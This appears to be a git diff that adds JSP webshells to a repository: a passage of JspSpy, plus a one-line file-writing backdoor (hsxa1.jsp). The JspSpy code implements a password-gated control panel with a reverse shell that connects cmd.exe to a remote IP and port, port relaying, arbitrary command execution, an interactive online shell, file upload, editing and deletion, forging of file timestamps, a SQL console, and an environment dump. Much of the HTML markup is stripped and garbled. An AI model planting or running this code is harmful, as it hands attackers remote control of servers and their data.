|| Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); +remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +""+ +"

Back Connect >>

"+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

"+ +" "+ +"
"+ +"
"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

System Properties >>

"+ +"
"+ +"
"+ +"
    "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
  • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
    • "); +} +out.println("

System Environment >>

    "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
  • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
    • "); +} +out.println("
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
"); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
"); +out.println("

Shell OnLine »


"); +out.println("
"+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
"+ +"
"+ +" "+ +"
"+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
"+ +" " +); +out.println("
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//错误信息流。 +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); +ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); +ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoteDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); +ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (!Util.isEmpty(o)) { +Invoker in = ins.get(o); +if (in == null) { +response.sendRedirect(SHELL_NAME+"?o=index"); +} else { +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path)) +session.setAttribute(CURRENT_DIR,path); +ins.get("before").invoke(request,response,session); +ins.get("script").invoke(request,response,session); +ins.get("top").invoke(request,response,session); +} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +} +} else { +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
"),"left"); +bout.close(); +out.flush(); +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +%> \ No newline at end of file diff --git a/jsp/hsxa1.jsp b/jsp/hsxa1.jsp new file mode 100644 index 0000000..4f65f3f --- /dev/null +++ b/jsp/hsxa1.jsp @@ -0,0 +1 @@ +<%@ page language="java" pageEncoding="gbk"%><% int i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>0<%}}if(i==0){%>1<%}%>
" name="url">

"); +if (Util.isEmpty(sql)) { +String type = request.getParameter("type"); +if (Util.isEmpty(type) || type.equals("switch")) { +ResultSet tbs = meta.getTables(null,null,null,null); +out.println(Table.rs2Table(tbs,meta.getIdentifierQuoteString(),true)); +tbs.close(); +} else if (type.equals("struct")) { +String tb = request.getParameter("table"); +if (Util.isEmpty(tb)) +return; +ResultSet t = meta.getColumns(null,null,tb,null); +out.println(Table.rs2Table(t,"",false)); +t.close(); +} +} +} catch (Exception e) { +JSession.setAttribute(MSG,"Some Error Occurred. Please Check Out the StackTrace Follow."+BACK_HREF); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +((Invoker)ins.get("vConn")).invoke(request,response,JSession); +return; +} else { +((Invoker)ins.get("dbc")).invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("Query#0 : "+Util.htmlEncode(sql)+"

"); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +String v = null; +try { +v = rs.getString(i); +} catch (SQLException ex) { +v = "<>"; +} +r.addColumn(new Column(v)); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
"+meta.getColumnName(i)+"
"+meta.getColumnTypeName(i)+"

"); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("affected rows : "+obj+"

"); +} +} +} else { +((Invoker)ins.get("dbc")).invoke(request,response,JSession); +} +} catch (Exception e) { + +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("jspspy
"+ +""+ +"

Password: "+ +" "+ +" "+ +" "+ +"
"+ +"

"+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +((Invoker)ins.get("vLogin")).invoke(request,response,JSession); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME); +return; +} +} catch (Exception e) { + +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(Object obj1,Object obj2) { + try { + if (obj1 != null && obj2 != null) { + File f1 = (File)obj1; + File f2 = (File)obj2; + if (f1.isDirectory()) { + if (f2.isDirectory()) { + return f1.getName().compareTo(f2.getName()); + } else { + return -1; + } + } else { + if (f2.isDirectory()) { + return 1; + } else { + return f1.getName().toLowerCase().compareTo(f2.getName().toLowerCase()); + } + } + } + return 0; + } catch (Exception e) { + return 0; + } +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +String path2View = null; +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +String outEntry = request.getParameter("outentry"); +if (!Util.isEmpty(outEntry) && outEntry.equals("true")) { +JSession.removeAttribute(ENTER); +JSession.removeAttribute(ENTER_MSG); +JSession.removeAttribute(ENTER_CURRENT_DIR); +} +Object enter = JSession.getAttribute(ENTER); +File file = null; +if (!Util.isEmpty(enter)) { +if (Util.isEmpty(path)) { +if (JSession.getAttribute(ENTER_CURRENT_DIR) == null) +path = "/"; +else +path = (String)(JSession.getAttribute(ENTER_CURRENT_DIR)); +} +file = new EnterFile(path); +((EnterFile)file).setZf((String)enter); +JSession.setAttribute(ENTER_CURRENT_DIR,path); +} else { +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +file = new File(path); +} +path2View = Util.convertPath(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
"); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

"); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Current Directory
"+ +"
"); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (int i = 0;i"+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
"+ +"
"+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
 NameLast ModifiedSizeRead/Write/Execute 
=Goto Parent
0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow"); +if (enter != null) +out.println(" "); +else +out.println("Del | Move | Pack"); +out.println("
"+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy"); +if (enter == null ) { +out.println(" | Move | "+ +"Property | "+ +"Enter"); +if (f.getName().endsWith(".zip") || f.getName().endsWith(".jar")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +} +out.println("
 "); +if (enter != null) +out.println("Pack Selected - Delete Selected"); +else +out.println("Pack Selected - Delete Selected"); +out.println(""+dircount+" directories / "+filecount+" files
"); +out.println("
"); +if (file instanceof EnterFile) +((EnterFile)file).close(); +} catch (ZipException e) { +JSession.setAttribute(MSG,"\""+JSession.getAttribute(ENTER).toString()+"\" Is Not a Zip File. Please Exit."); +throw e; +} catch (Exception e) { +JSession.setAttribute(MSG,"File Does Not Exist Or You Dont Have Privilege."+BACK_HREF); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +((Invoker)ins.get("vLogin")).invoke(request,response,JSession); +} catch (ClassCastException e) { +JSession.invalidate(); +((Invoker)ins.get("vLogin")).invoke(request,response,JSession); +} catch (Exception e) { + +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +File f = new File(JSession.getAttribute(CURRENT_DIR)+"/"+fileBean.getFileName()); +if (f.exists() && f.length() > 0) +JSession.setAttribute(MSG,"Upload File Success!"); +else +JSession.setAttribute("MSG","Upload File Failed!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +InputStream in = null; +Object enter = JSession.getAttribute(ENTER); +if (enter == null) +in = new FileInputStream(new File(src)); +else { +ZipFile zf = new ZipFile((String)enter); +ZipEntry entry = zf.getEntry(src); +in = zf.getInputStream(entry); +} +BufferedInputStream input = new BufferedInputStream(in); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { +output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
Copyright (C) 2010 http://www.Forjj.com/  [T00ls.Net] All Rights Reserved."+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
"+ +"
"+ +"

Create / Edit File »

"+ +""+ +"

Current File (import new file name and new file)
"+ +"

"+ +"

File Content

"+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String charset = request.getParameter("charset"); +Object enter = JSession.getAttribute(ENTER); +InputStream input = null; +if (enter != null) { +ZipFile zf = new ZipFile((String)enter); +ZipEntry entry = new ZipEntry(path); +input = zf.getInputStream(entry); +} else { +File f = new File(path); +if (!f.exists()) +return; +input = new FileInputStream(path); +} + +BufferedReader reader = null; +if (Util.isEmpty(charset) || charset.equals("ANSI")) +reader = new BufferedReader(new InputStreamReader(input)); +else +reader = new BufferedReader(new InputStreamReader(input,charset)); +StringBuffer content = new StringBuffer(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
"+ +"
"+ +"

Create / Edit File »

"+ +""+ +"

Current File (import new file name and new file)
"+ +"

"+ +"

File Content

"+ +"

"); +if (enter != null) +out.println(""); +else +out.println(""); +out.println("

"+ +"
"+ +"
"); + +} catch (Exception e) { + +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); +String charset = request.getParameter("charset"); +BufferedWriter outs = null; +if (charset.equals("ANSI")) +outs = new BufferedWriter(new FileWriter(new File(path))); +else +outs = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(path)),charset)); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File "+(new File(path)).getName()+" With "+charset+" Success!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); + +out.println("
"+ +"
"+ +"

Set File Property »

"+ +"

Current File (FullPath)

"+ +" "+ +"

"+ +" Read "+ +" Write "+ +"

"+ +"

Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

"+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) { +if (ISLINUX) +cmd = "id"; +else +cmd = "cmd.exe /c set"; +} +if (program == null) +program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
"+ +"
"+ +"

Execute Program »

"+ +"

"+ +""+ +""+ +"Parameter
"+ +""+ +"

"+ +"
"+ +"
"+ +"

Execute Shell »

"+ +"

"+ +""+ +""+ +"Parameter
"+ +""+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +((Invoker)ins.get("vs")).invoke(request,response,JSession); +out.println("
"); +out.println("
");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+reader = new BufferedReader(new InputStreamReader(pro.getErrorStream()));
+s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("
"); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +((Invoker)ins.get("vs")).invoke(request,response,JSession); +} +} +} catch (Exception e) { + +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +InputStream i = null; +Object enter = JSession.getAttribute(ENTER); +String fileName = null; +if (enter == null) { +File f = new File(path); +if (!f.exists()) +return; +fileName = f.getName(); +i = new FileInputStream(f); +} else { +ZipFile zf = new ZipFile((String)enter); +ZipEntry entry = new ZipEntry(path); +fileName = entry.getName().substring(entry.getName().lastIndexOf("/") + 1); +i = zf.getInputStream(entry); +} +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(fileName,PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(i); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { + +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.forjj.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
"+ +"
"+ +"

Remote File DownLoad »

"+ +"

"+ +""+ +"

File   URL: "+ +"

"+ +"

Save Path: "+ +"

"+ +""+ +"

"+ +"
